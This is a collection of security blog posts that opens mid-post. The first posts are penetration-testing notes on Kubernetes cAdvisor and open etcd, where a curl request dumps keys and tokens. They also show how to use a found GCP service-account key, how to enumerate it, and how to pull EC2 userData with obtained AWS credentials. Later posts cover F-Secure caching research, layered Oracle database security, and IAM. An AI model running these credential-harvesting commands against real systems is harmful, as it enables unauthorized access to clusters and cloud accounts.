https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/

What do you get?

information disclosure about metrics of the containers.

Example request to hit the API and dump data:

http://1.2.3.4:4194/api/v2.0/spec?recursive=true

Screenshots



Kubernetes: kube-hunter.py etcd


I mentioned in the master post one a few auditing tools that exist. Kube-Hunter is one that is pretty ok.  You can use this to quickly scan for multiple kubernetes issues.


Example run:
$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Subnet scanning      (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services...
|
| Etcd:
|   type: open service
|   service: Etcd
|_  host: 1.2.3.4:2379
|
| Etcd Remote version disclosure:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote version disclosure might give an
|_    attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Etcd is accessible using HTTP (without
|     authorization and authentication), it would allow a
|     potential attacker to
|     gain access to
|_    the etcd
|
| Etcd Remote Read Access Event:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote read access might expose to an
|_    attacker cluster's possible exploits, secrets and more.

----------

Nodes
+-------------+----------------+
| TYPE        | LOCATION       |
+-------------+----------------+
| Node/Master | 1.2.3.4        |
+-------------+----------------+

Detected Services
+---------+---------------------+----------------------+
| SERVICE | LOCATION            | DESCRIPTION          |
+---------+---------------------+----------------------+
| Etcd    | 1.2.3.4:2379        | Etcd is a DB that    |
|         |                     | stores cluster's     |
|         |                     | data, it contains    |
|         |                     | configuration and    |
|         |                     | current state        |
|         |                     | information, and     |
|         |                     | might contain        |
|         |                     | secrets              |
+---------+---------------------+----------------------+

Vulnerabilities
+--------------+------------------+----------------------+---------------------+--------------------------+
| LOCATION     | CATEGORY         | VULNERABILITY        | DESCRIPTION         | EVIDENCE                 |
+--------------+------------------+----------------------+---------------------+--------------------------+
| 1.2.3.4:2379 | Unauthenticated  | Etcd is accessible   | Etcd is accessible  | {"etcdserver":"3.3.9     |
|              | Access           | using insecure       | using HTTP (without | ","etcdcluster":"3.3     |
|              |                  | connection (HTTP)    | authorization and   | ...                      |
|              |                  |                      | authentication), it |                          |
|              |                  |                      | would allow a       |                          |
|              |                  |                      | potential attacker  |                          |
|              |                  |                      | to                  |                          |
|              |                  |                      |     gain access to  |                          |
|              |                  |                      | the etcd            |                          |
+---------------------+----------------------+----------------------+----------------------+--------------+
| 1.2.3.4:2379 | Information      | Etcd Remote version  | Remote version      | {"etcdserver":"3.3.9     |
|              | Disclosure       | disclosure           | disclosure might    | ","etcdcluster":"3.3     |
|              |                  |                      | give an attacker a  | ...                      |
|              |                  |                      | valuable data to    |                          |
|              |                  |                      | attack a cluster    |                          |
+---------------------+----------------------+----------------------+----------------------+--------------+
| 1.2.3.4:2379 | Access Risk      | Etcd Remote Read     | Remote read access  | {"action":"get","nod     |
|              |                  | Access Event         | might expose to an  | e":{"dir":true,"node     |
|              |                  |                      | attacker cluster's  | ...                      |
|              |                  |                      | possible exploits,  |                          |
|              |                  |                      | secrets and more.   |                          |
+--------------+------------------+----------------------+---------------------+--------------------------+

Kubernetes: open etcd

Quick post on Kubernetes and open etcd (port 2379)

"etcd is a distributed key-value store. In fact, etcd is the primary datastore of Kubernetes; storing and replicating all Kubernetes cluster state. As a critical component of a Kubernetes cluster having a reliable automated approach to its configuration and management is imperative."

-from: https://coreos.com/blog/introducing-the-etcd-operator.html 

What this means in english is that etcd stores the current state of the Kubernetes cluster usually including the kubernetes tokens and passwords.  If you check out the following references you can get a sense for the pain level that could potentially be involved. At minimum you can get network info or running pods and at best credentials.

refs: 
https://techbeacon.com/hackers-guide-kubernetes-security 
https://elweb.co/the-security-footgun-in-etcd/
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/

the second link talks extensively around types of info the found when they hit all the shodan endpoints for 2379 and did some analysis on the results.

If you manage to find open etcd the easiest way to check for creds is to just do a curl request for:

GET http://ip_address:2379/v2/keys/?recursive=true

Example Loot - 

Usually it's boring stuff like this:



But occasionally you'll get more interesting things like:



or more fun things like kublet tokens:




I found a GCP service account token…now what?

Google Cloud Platform (GCP) is rapidly growing in popularity and i haven't seen too many posts on  f**king it up so I'm going to do at least one :-)

Google has several ways to do authentication but most likely what you are going to come across shoved into code somewhere or in a dotfiles is a service account json file.

It's going to look similar to this:

These service account files are similar to AWS tokens in that it can be difficult to determine what they have access to if you don't already have console and/or IAM access. However with a little bit of scripting we can brute force at least some of the token's functionality pretty quickly. The issue being service accounts for something like GCP compute looks the same as one you made to manage your calendar or one of the 100's of other Google services.

You'll need to install the gcloud tools for you OS. Info here:  https://cloud.google.com/sdk/

Once you have the gcloud suite of tools installed you can auth with the json file with the following command:

gcloud auth activate-service-account --key-file=KEY_FILE

If they key is invalid you'll see something like the below:

gcloud auth activate-service-account --key-file=21.json
ERROR: (gcloud.auth.activate-service-account) There was a problem refreshing your current auth tokens: invalid_grant: Not a valid email or user ID.

Otherwise it will look similar to below:

gcloud auth activate-service-account --key-file=/Users/CG/Documents/pentest/gcp-weirdaal/gcp.json
Activated service account credentials for: [python@removed.iam.gserviceaccount.com]

you can validate it worked by issuing gcloud auth list command:

gcloud auth list
                  Credentialed Accounts
ACTIVE  ACCOUNT

*       python@removed.iam.gserviceaccount.com


I put together a shell script that runs though a bunch of command to enumerate information. They only you info need to provide is the project name. This can be found in the json file in the project_id  field or by issuing the  gcloud project list command.  Sometimes there are multiple projects associated with an account and you'd need to run the shell script with for each project.

The first time you run these api calls you might need to pass a "Y" to the cli to enable it. you can get around this manual shenanigans by doing a:

yes | ./gcp_enum.sh 

This will answer Yes for you each time :-)






NCC Group also has two tools you could check out:

https://github.com/nccgroup/G-Scout

and

https://github.com/nccgroup/ScoutSuite


enjoy

CG

AWS EC2 instance userData

In the effort to get me blogging again I'll be doing a few short posts to get the juices flowing (hopefully).

Today I learned about the userData instance attribute for AWS EC2.

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

In general I thought metadata was only things you can hit from WITHIN the instance via the metadata url: http://169.254.169.254/latest/meta-data/

However, if you read the link above there is an option to add metadata at boot time. 


You can also use instance metadata to access user data that you specified when launching your instance. For example, you can specify parameters for configuring your instance, or attach a simple script. 

That's interesting right?!?!  so if you have some AWS creds the easiest way to check for this (after you enumerate instance IDs) is with the aws cli.

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX

An error occurred (InvalidInstanceID.NotFound) when calling the DescribeInstanceAttribute operation: The instance ID 'i-0XXXXXXXX' does not exist

ah crap, you need the region...

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX --region us-west-1
{
    "InstanceId": "i-0XXXXXXXX",
    "UserData": {
        "Value": "bm90IHRvZGF5IElTSVMgOi0p"}


anyway that can get tedious especially if the org has a ton of things running.  This is precisely the reason @cktricky and I built weirdAAL.  Surely no one would be sticking creds into things at boot time via shell scripts :-)


The module loops trough all the regions and any instances it finds and queries for the userData attribute.  Hurray for automation.

That module is in the current version of weirdAAL. Enjoy.

-CG

Improve Security by Thinking Beyond the Security Realm

It used to be that dairy farmers relied on whatever was growing in the area to feed their cattle. They filled the trough with vegetation grown right on the farm. They probably relied heavily on whatever grasses grew naturally and perhaps added some high-value grains like barley and corn. Today, with better technology and knowledge, dairy farmers work with nutritionists to develop a personalized concentrate of carbohydrates, proteins, fats, minerals, and vitamins that gets added to the natural feed. The result is much healthier cattle and more predictable growth.

We’re going through a similar enlightenment in the security space. To get the best results, we need to fill the trough that our Machine Learning will eat from with high-value data feeds from our existing security products (whatever happens to be growing in the area) but also (and more precisely for this discussion) from beyond what we typically consider security products to be.

In this post to the Oracle Security blog, I make the case that "we shouldn’t limit our security data to what has traditionally been in-scope for security discussions" and how understanding Application Topology (and feeding that knowledge into the security trough) can help reduce risk and improve security.

Click to read the full article: Improve Security by Thinking Beyond the Security Realm

Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years, and has been a joint collaboration between ten industry partners and academic entities. Here’s the official description of the project.

The Scalable and Secure Infrastructures for Cloud Operations (SSICLOPS, pronounced “cyclops”) project focuses on techniques for the management of federated cloud infrastructures, in particular cloud networking techniques within software-defined data centres and across wide-area networks. SSICLOPS is funded by the European Commission under the Horizon2020 programme (https://ssiclops.eu/). The project brings together industrial and academic partners from Finland, Germany, Italy, the Netherlands, Poland, Romania, Switzerland, and the UK.

The primary goal of the SSICLOPS project is to empower enterprises to create and operate high-performance private cloud infrastructure that allows flexible scaling through federation with other clouds without compromising on their service level and security requirements. SSICLOPS federation supports the efficient integration of clouds, no matter if they are geographically collocated or spread out, belong to the same or different administrative entities or jurisdictions: in all cases, SSICLOPS delivers maximum performance for inter-cloud communication, enforce legal and security constraints, and minimize the overall resource consumption. In such a federation, individual enterprises will be able to dynamically scale in/out their cloud services: because they dynamically offer own spare resources (when available) and take in resources from others when needed. This allows maximizing own infrastructure utilization while minimizing excess capacity needs for each federation member.

Many of our systems (both backend and on endpoints) rely on the ability to quickly query the reputation and metadata of objects from a centrally maintained repository. Reputation queries of this type are served either directly from the central repository, or through one of many geographically distributed proxy nodes. When a query is made to a proxy node, if the required verdicts don’t exist in that proxy’s cache, the proxy queries the central repository, and then delivers the result. Since reputation queries need to be low-latency, the additional hop from proxy to central repository slows down response times.

In the scope of the SSICLOPS project, we evaluated a number of potential improvements to this content distribution network. Our aim was to reduce the number of queries from proxy nodes to the central repository, by improving caching mechanisms for use cases where the set of the most frequently accessed items is highly dynamic. We also looked into improving the speed of communications between nodes via protocol adjustments. Most of this work was done in cooperation with Deutsche Telecom and Aalto University.

The original implementation of our proxy nodes used a Least Recently Used (LRU) caching mechanism to determine which cached items should be discarded. Since our reputation verdicts have time-to-live values associated with them, these values were also taken into account in our original algorithm.

Hit Rate Results

Initial tests performed in October 2017 indicated that SG-LRU outperformed LRU on our dataset

During the project, we worked with Gerhard Hasslinger’s team at Deutsch Telecom to evaluate whether alternate caching strategies might improve the performance of our reputation lookup service. We found that Score-Gated LRU / Least Frequently Used (LFU) strategies outperformed our original LRU implementation. Based on the conclusions of this research, we have decided to implement a windowed LFU caching strategy, with some limited “predictive” features for determining which items might be queried in the future. The results look promising, and we’re planning on bringing the new mechanism into our production proxy nodes in the near future.

fraction_of_top_k_results_compared_to_cache_hit_rates

SG-LRU exploits the focus on top-k requests by keeping most top-k objects in the cache

The work done in SSICLOPS will serve as a foundation for the future optimization of content distribution strategies in many of F-Secure’s services, and we’d like to thank everyone who worked with us on this successful project!

Layered Database Security in the age of Data Breaches

We live in a time of daily breach notifications. One recently affected organization in Germany put out a statement which said: "The incident is not attributable to security deficiencies." and "Human error can also be ruled out." They went on say that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." It's a tough climate we find ourselves in. It  just feels too hard or impossible at times. And there's some truth to that. There are way too many potential attack vectors for comfort.

Many breaches occur in ways that make it difficult to pinpoint exactly what might have prevented it. Or, the companies involved hide details about what actually happened or how. In some cases, they lie. They might claim there was some Advanced Persistent Threat on the network when in reality, it was a simple phishing attack where credentials were simply handed over.

In one recent case, a third party vendor apparently uploaded a database file to an unsecured Amazon AWS server. A media outlet covering the story called out that it was not hacking because the data was made so easily available. Numerous checkpoints come to mind that each could have prevented or lessened the damage in this scenario. I’d like to paint a picture of the numerous layers of defense that should be in place to help prevent this type of exposure.

Layer 1: Removing Production Data
The data should have been long removed from the database.
Assuming this is a non-production database (and I sure hope it is), it should have been fully masked before it was even saved as a file. Masking data means completely removing the original sensitive data and replacing it with fake data that looks and acts real. This enables safe use of the database for app development, QA, and testing. Data can be masked as it’s exported from the production database (most secure) or in a secure staging environment after the initial export. Had this step been done, the database could safely be placed on an insecure AWS server with limited security concerns because there’s no real data. An attacker could perhaps use the DB schema or other details to better formulate an attack on the production data, so I’m not recommending posting masked databases publicly, but the risk of data loss is severely limited once the data is masked.

Layer 2: Secure Cloud Server Configuration
The researcher should never have been able to get to the file.
A security researcher poking around the web should never have been able to access this database file. Proper server configuration and access controls should prevent unauthorized access to any files (including databases). In addition to documenting proper security configuration, certain Cloud Security Access Brokers can be used to continuously monitor AWS instances to ensure that server configurations match the corporate guidelines. Any instances of configuration drift can be auto-remediated with these solutions to ensure that humans don’t accidentally misconfigure servers or miss security settings in the course of daily administration.

Layer 3: Apply Database Encryption
Even with access to the database file, the researcher should not have been able to access the data.
At-rest data encryption that is built into the database protects sensitive data against this type of scenario. Even if someone has the database file, if it were encrypted, the file would essentially be useless. An attacker would have to implement an advanced crypto attack which would take enormous resources and time to conduct and is, for all intents and purposes, impractical. Encryption is a no-brainer. Some organizations use disk-layer encryption, which is OK in the event of lost or stolen disk. However, if a database file is moved to an unencrypted volume, it is no longer protected. In-database encryption improves security because the security stays with the file regardless of where it’s moved or exported. The data remains encrypted and inaccessible without the proper encryption keys regardless of where the database file is moved.

Layer 4: Apply Database Administrative Controls
Even with administrative permissions to the database, the researcher should not have been able to access the sensitive data.
I’m not aware of similar capabilities outside of Oracle database, but Oracle Database Vault would have also prevented this breach by implementing access controls within the database. Database Vault effectively segregates roles (enforces Separation of Duties) so that even an attacker with DBA permissions and access to the database file and encryption keys cannot run queries against the sensitive application data within the database because their role does not allow it. This role-based access, enforced within the database, is an extremely effective control to avoid accidental access that may occur throughout the course of daily database administration.

Layer 5: Protect Data Within the Database
Even with full authorization to application data, highly sensitive fields should be protected within the database.
Assuming all of the other layers break down and you have full access to the unencrypted database file and credentials that are authorized to access the sensitive application data, certain highly sensitive fields should be protected via application-tier encryption. Social Security Numbers and Passwords, for example, shouldn’t be stored in plain text. By applying protection for these fields at the app layer, even fully authorized users wouldn’t have access. We all know that passwords should be hashed so that the password field is only useful to the individual user who enters their correct password. But other fields, like SSN, can be encrypted at the app layer to protect against accidental exposure (human error), intentional insider attack, or exposed credentials (perhaps via phishing attack).

Maybe the vendor didn’t follow the proper protocols instituted by the organization. Maybe they made a human error; we all make mistakes. But, that’s why a layered approach to database security is critical on any database instances where sensitive production data resides. Security protocols shouldn’t require humans to make the right decisions. They should apply security best practices by default and without option.

Assuming this was a non-production database, any sensitive data should have been fully masked/replaced before it was even made available. And, if it was a production DB, database encryption and access control protections that stay with the database during export or if the database file is moved away from an encrypted volume should have been applied. The data should have been protected before the vendor's analyst ever got his/her hands on it. Oracle Database Vault would have prevented even a DBA-type user from being able to access the sensitive user data that was exposed here. These are not new technologies; they’ve been around for many years with plentiful documentation and industry awareness.

Unfortunately, a few of the early comments I read on this particular event were declarations or warnings about how this proves that cloud is less secure than on-premises deployments. I don’t agree. Many cloud services are configured with security by default and offer far more protection than company-owned data centers. Companies should seek cloud services that enable security by default and that offer layered security controls; more security than their own data centers. It’s more than selecting the right Cloud Service Provider. You also need to choose the right service; one that matches the specific needs (including security needs) of your current project. The top CSPs offer multiple IaaS and/or PaaS options that may meet the basic project requirements. While cloud computing grew popular because it’s easy and low cost, ease-of-use and cost are not always the most important factors when choosing the right cloud service. When sensitive data is involved, security needs to be weighed heavily when making service decisions.

I'll leave you with this. Today's computing landscape is extremely complex and constantly changing. But security controls are evolving to address what has been called the extended enterprise (which includes cloud computing and user mobility among other characteristics). Don't leave security in the hands of humans. And apply security in layers to cover as many potential attack vectors as possible. Enable security by default and apply automated checks to ensure that security configuration guidelines are being followed.

Note: Some of the content above is based on my understanding of Oracle security products (encryption, masking, CASB, etc.) Specific techniques or advantages mentioned may not apply to other vendors’ similar solutions.

IAM for the Third Platform

As more people are using the phrase "third platform", I'll assume it needs no introduction or explanation. The mobile workforce has been mobile for a few years now. And most organizations have moved critical services to cloud-based offerings. It's not a prediction, it's here.

The two big components of the third platform are mobile and cloud. I'll talk about both.

Mobile

A few months back, I posed the question "Is MAM Identity and Access Management's next big thing?" and since I did, it's become clear to me that the answer is a resounding YES!

Today, I came across a blog entry explaining why Android devices are a security nightmare for companies. The pain is easy to see. OS Updates and Security Patches are slow to arrive and user behavior is, well... questionable. So organizations should be concerned about how their data and applications are being accessed across this sea of devices and applications. As we know, locking down the data is not an option. In the extended enterprise, people need access to data from wherever they are on whatever device they're using. So, the challenge is to control the flow of information and restrict it to proper use.

So, here's a question: is MDM the right approach to controlling access for mobile users? Do you really want to stand up a new technology silo that manages end-user devices? Is that even practical? I think certain technologies live a short life because they quickly get passed over by something new and better (think electric typewriters). MDM is one of those. Although it's still fairly new and good at what it does, I would make the claim that MDM is antiquated technology. In a BYOD world, people don't want to turn control of their devices over to their employers. The age of enterprises controlling devices went out the window with Blackberry's market share.

Containerization is where it's at. With App Containerization, organizations create a secure virtual workspace on mobile devices that enables corporate-approved apps to access, use, edit, and share corporate data while protecting that data from escape to unapproved apps, personal email, OS malware, and other on-device leakage points. For enterprise use-case scenarios, this just makes more sense than MDM. And many of the top MDM vendors have validated the approach by announcing MAM offerings. Still, these solutions maintain a technology silo specific to remote access which doesn't make much sense to me.

As an alternate approach, let's build MAM capabilities directly into the existing Access Management platform. Access Management for the third platform must accommodate for mobile device use-cases. There's no reason to have to manage mobile device access differently than desktop access. It's the same applications, the same data, and the same business policies. User provisioning workflows should accommodate for provisioning mobile apps and data rights just like they've been extended to provision Privileged Account rights. You don't want or need separate silos.

Cloud

The same can be said, for cloud-hosted apps. Cloud apps are simply part of the extended enterprise and should also be managed via the enterprise Access Management platform.

There's been a lot of buzz in the IAM industry about managing access (and providing SSO) to cloud services. There have even been a number of niche vendors pop-up that provide that as their primary value proposition. But, the core technologies for these stand-alone solutions is nothing new. In most cases, it's basic federation. In some cases, it's ESSO-style form-fill. But there's no magic to delivering SSO to SaaS apps. In fact, it's typically easier than SSO to enterprise apps because SaaS infrastructures are newer and support newer standards and protocols (SAML, REST, etc.)

My Point

I guess if I had to boil this down, I'm really just trying to dispel the myths about mobile and cloud solutions. When you get past the marketing jargon, we're still talking about Access Management and Identity Governance. Some of the new technologies are pretty cool (containerization solves some interesting, complex problems related to BYOD). But in the end, I'd want to manage enterprise access in one place with one platform. One Identity, One Platform. I wouldn't stand up a IDaaS solution just to have SSO to cloud apps. And I wouldn't want to introduce an MDM vendor to control access from mobile devices.

The third platform simply extends the enterprise beyond the firewall. The concept isn't new and the technologies are mostly the same. As more and newer services adopt common protocols, it gets even easier to support increasingly complex use-cases. An API Gateway, for example, allows a mobile app to access legacy mainframe data over REST protocols. And modern Web Access Management (WAM) solutions perform device fingerprinting to increase assurance and reduce risk while delivering an SSO experience. Mobile Security SDKs enable organizations to build their own apps with native security that's integrated with the enterprise WAM solution (this is especially valuable for consumer-facing apps).

And all of this should be delivered on a single platform for Enterprise Access Management. That's third-platform IAM.